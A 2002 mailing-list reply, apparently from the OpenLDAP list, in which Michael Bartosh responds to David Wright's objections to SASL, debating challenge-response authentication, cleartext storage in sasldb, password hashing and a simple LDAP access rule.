At 1:13 AM -0700 4/10/02, David Wright wrote: >Since there is such as SASL love-fest going on here, allow me to >chime in with my dissenting viewpoint. SASL adds nothing but an >annoying dependency to LDAP. No, I take that back, it also adds a >security hole. > >Challenge-response mechanisms have absolutely no advantage over >straight password transmittion across an SSL/TLS encrypted line. In >fact, if they run in cleartext, they have a few disadvantages: (1) >No server certificate authentication. (2) If you watch >challenge-response a few times, you can get a good deal of the way >toward decrypting the password.
Putting the password over the wire is always a bad idea. Maybe I'm a dork for buying into Kerb, but hey, I'm sold, sue me. Sasl seems like the best way to abstract kerb out to LDAP, cyrus, etc. > >Furthermore, in order to support multiple authentication mechanisms, >SASL must store password essentially in cleartext (i.e. not in a >hased form). That means if anyone ever gets access to your sasldb, >you are hosed. Not true for an LDAP database, stores passwords in >hashed form. I disagree. Given modern hardware, hashed passwords are 90% (arbitrary number out of a hat) as dangerous as cleartext ones. MD5 improves on that a lot (until we get better hardware), but the vast majority of hashes are by default still crypt. > >The only advantage of a security layer is flexibility: allowing >authentication via arbitrary backeds (LDAP, SQL, passwd, shadow, >kerberos). While SASL makes this possible in theory, I have not had >good experiences in trying to make use of this flexibility -- there >is very little in the way of widely-distributed, well-tested, >well-supported, drop-in code to do all this stuff. > >Finally, Birger, what's "really creative" about > > by self write > by anonymous auth > by * none To be fair, I said that. -- http://www.4am-media.com Mac OS X Consulting and Training Michael Bartosh [EMAIL PROTECTED] 303.517.0272 Denver, CO "The surest way to corrupt a youth is to instruct him to hold in higher regard those who think alike than those who think differently." - -- Nietzsche Think Different.
